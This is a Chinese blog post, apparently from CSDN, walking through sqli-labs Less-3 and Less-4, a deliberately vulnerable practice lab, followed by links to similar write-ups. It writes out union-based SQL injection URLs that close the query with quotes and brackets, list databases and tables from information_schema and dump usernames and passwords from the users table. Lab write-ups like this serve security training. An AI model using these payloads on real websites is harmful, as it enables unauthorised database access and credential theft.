sqli-labs-master【Less-3/4】

最新推荐文章于 2024-01-15 17:48:10 发布
最新推荐文章于 2024-01-15 17:48:10 发布
阅读量310 收藏
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44352521/article/details/103477189
版权

今天我们来学习sqli-labs的第三关!

1. 判断注入的数据类型

http://192.168.228.129/sqli-labs-master/Less-3/?id=1

在这里插入图片描述

http://192.168.228.129/sqli-labs-master/Less-3/?id=1 and 1=2

在这里插入图片描述
根据url中输入的内容,输入id=1跟id=1 and 1=2结果一样没有变化,所以我们判断是非整型注入;则有可能是字符型注入,所以我们现在来构造闭合语句,然后看执行的结果:

192.168.228.129/sqli-labs-master/Less-3/?id=1' --+

在这里插入图片描述
用单引号闭合时,可以看到出现错误,说明存在注入点,当我们 用注释符注释掉后面的内容的时候,仍然报错,说明前面还没有完全闭合,所以我们继续在此基础上构造闭合:

http://192.168.228.129/sqli-labs-master/Less-3/?id=1) --+

在这里插入图片描述
可以看出,已经完全闭合了,我们可以通过and来测试结果是否正确:

http://192.168.228.129/sqli-labs-master/Less-3/?id=1) and 1=2 --+

在这里插入图片描述
当我们在后面跟上1=2的时候,我们的语法是正确的,但是整个条件恒为假,所以就会不显示任何东西,可见我们的判断是正确的。

2. 猜字段

在这里插入图片描述
在这里插入图片描述
结果显示有三个字段!

3. 报数据库

所以我们现在可以在这些显示位上用一些数据库函数来获取一些信息:

http://192.168.228.129/sqli-labs-master/Less-3/?id=-1) union select null,database(),user() --+

在这里插入图片描述
爆数据库成功,还有该数据库的权限管理者,我们还可以在继续借助information_schema来把所有的数据库都爆出来:

http://192.168.228.129/sqli-labs-master/Less-3/?id=-1) union select null,group_concat(schema_name),null from information_schema.schemata --+

在这里插入图片描述

4. 爆字段

到这块之后,我们知道了当前数据库的名字,接下来要做的就是把security库里面所有表爆出来,进而在把表中的字段,以及数据爆出来:

http://192.168.228.129/sqli-labs-master/Less-3/?id=-1) union select null,group_concat(table_name,--,column_name),null from information_schema.columns where table_schema=‘security’ and table_name=‘users’ --+

在这里插入图片描述

5. 爆数据

现在已经爆出users表中的三个字段,数据的话方法与Less-1和2一样,如下:

http://192.168.228.129/sqli-labs-master/Less-3/?id=-1) union select null,null,group_concat(id,--,username,--,password) from users --+

在这里插入图片描述
到此,Less-3数据爆破结束!!!

我们顺便再来看看Less-4,因为后面爆破数据库、数据库表、表字段、表数据的语句语法都相同,所以我们在这里只判断Less-4的注入类型:

http://192.168.228.129/sqli-labs-master/Less-4/?id=1

在这里插入图片描述

http://192.168.228.129/sqli-labs-master/Less-4/?id=1

在这里插入图片描述
可以看出,闭合1之后页面并没有发生改变,这并不是我们想要的结果,所以我们继续猜测:

http://192.168.228.129/sqli-labs-master/Less-4/?id=1--+

在这里插入图片描述
可以看出,我们用"闭合显示语法错误,说明存在注入;并且根据错误提示可以看出,可能是缺少一个括号,于是我们尝试加一个括号看页面有什么提示:

http://192.168.228.129/sqli-labs-master/Less-4/?id=1") --+

在这里插入图片描述
显示正常,并且我们可以用and来测试一下:

http://192.168.228.129/sqli-labs-master/Less-4/?id=1) and 1=1 --+

在这里插入图片描述
到此,注入类型已经明确为字符型注入;
最后,爆数据的语句如下:

http://192.168.228.129/sqli-labs-master/Less-4/?id=-1) union select null,null,group_concat(id,-,username,-,password) from users--+

在这里插入图片描述
Less-4就到此结束,中间的一些过程感兴趣的朋友可以自己去尝试,方式与前几关类似;

TTRy_Harder
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master/ Less-1记录
qq_45052704的博客
07-03 758
sqli-labs-master学习记录
Sqli-Labs闯关—Less3
weixin_39157582的博客
08-19 221
Sqli-Labs闯关—Less3 基于错误的GET单引号变形字符型注入 (1)判断注入类型 输入?id=1’ 页面显示不正常,出现一个括号),怀疑sql语句是以括号闭合的 http://localhost/sqli-labs-master/Less-3/?id=1’ 输入?id=1’)–+页面回显正常,说明此处是字符型注入,而且是以(’’)的方式闭合字符串的。 (2)使用order by判断列数 输入order by 3页面回显正常,输入order by 4页面回显不正常,说明列数为3列。
sqli-labs less-3
dust_hk的博客
01-22 899
解题笔记 今天开始练习手工注入,拿sqli labs做靶机 less1,less2很轻松的就可以通过,在做到less3的时候遇到点瓶颈 首先,判断sql注入类型为字符型 输入 and 1=1 和and 1=2 回显页面相同,所以排除整形注入。 输入 ’ and 1=1 – + 和 ’ and 1=2 --+报同样的错,尝试双引号闭合。 双引号闭合后1=1 和1=2 均回显正常页面。所以...
sql注入系列 sqli-labs-less-3
yzcn
10-22 306
Less-3 判断注入: http://127.0.0.1/sqli-labs-master/Less-3/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-3/?id=1’ 出错,错误:’‘1’’) LIMIT 0,1’,多了半个) http://127.0.0.1/sqli-labs-master/Less-3/?id=1’) --+ 显示正常,表明存在注入漏洞,且判断原数据输入应该是(‘id’),输入1’)–+后,变为(‘1’)–+’),阴影部分
Sqli-labs less 3
weixin_34214500的博客
08-11 112
Less-3 我们使用?id=' 注入代码后,我们得到像这样的一个错误: MySQLserverversionfortherightsyntaxtousenear"")LIMIT0,1′atline1 这里它意味着,开发者使用的查询是: Selectlogin_name,selectpasswordfromtablewhereid=(...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs—————Less-3
Fly_鹏程万里
05-08 1660
Less-3根据提示传入参数id,数据类型为numeric老样子,用单引号测试报错的内容为:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at...
sqli-labs-master less-1---less-4
qq_44813849的博客
07-20 164
less-1 根据提示尝试输入一个id=1,能够看到数据 在1后面加一个 ’ ,开始报错 然后查看一下源代码和错误提示我们了解到,提交的sql中的 1’ 构造形成了’1’’ LIMIT 0,1 我们应该把后面的注释掉 所以在后面加一个 %23或–+ 接着使用order by 来对数据进行排序,我们可以从1开始测试或者使用均分法先从一个大的数据测,然后再分半。这一题测试过后只有三列,四就开...
SQLi-LABS的Less3分析
最新发布
haoahaoahaoahao的博客
01-15 439
可知id=-1不存在,那么select*from 表名 where (‘id=-1')不动,在url输入的命令union select 1,database(),3会启动。’) 那么--+后面的’)就被注释掉了那么简单理解变为select*from 表名 where id=(‘1‘)id=-1') union select 1,database(),3--+id=-1') union select 1,2,3--+id=1 order by 4 --+id=1’)--+正常。id=1’--+显示。
sqli-labs—————Less-4
Fly_鹏程万里
05-08 655
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
sqli-labs less 3
Monster1m的博客
01-01 117
一、输入id,正常显示 http://127.0.0.1/sqli-labs-master/Less-3/?id=1 二、判断数字型还是字符型。1=1和1=2都显示正常,则说明是字符型注入 http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=1 http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=2 三、判断闭合方式 1.尝试单引号,报错 http://127.0.0.1/sqli-labs-
sqli-labs-master/ Less-4
qq_45052704的博客
07-05 404
SQL学习记录
Sqli-Labs之less-3
ISNS的博客
02-05 1091
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
Sqli labs系列-less-4 这关好坑!!!
weixin_30855099的博客
08-28 70
这章,可能我总结开会比较长,图比较多,因为,我在做了一半,走进了一个死胡同,脑子,一下子没想开到底为啥。。。。 然后我自己想了好长时间也没想开,我也不想直接就去看源码,所以就先去百度了一下,结果一下子,我又跳进另一个坑了。。。。正如这章的顶图,MySQL语句,我看人家正好用这个分析,为什么大家在构造语句的时候要用这个SQL语句,我自己想了想,我好像没总结这么细,所以就趁着这章,把那个SQL语句的...
SQLi-LABS靶场 less-4教学
小明师傅博客
06-11 300
and 1=1 and 1=2 ?id=1’没反应 试一下双引号可以了,发现还有个括号 成功
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值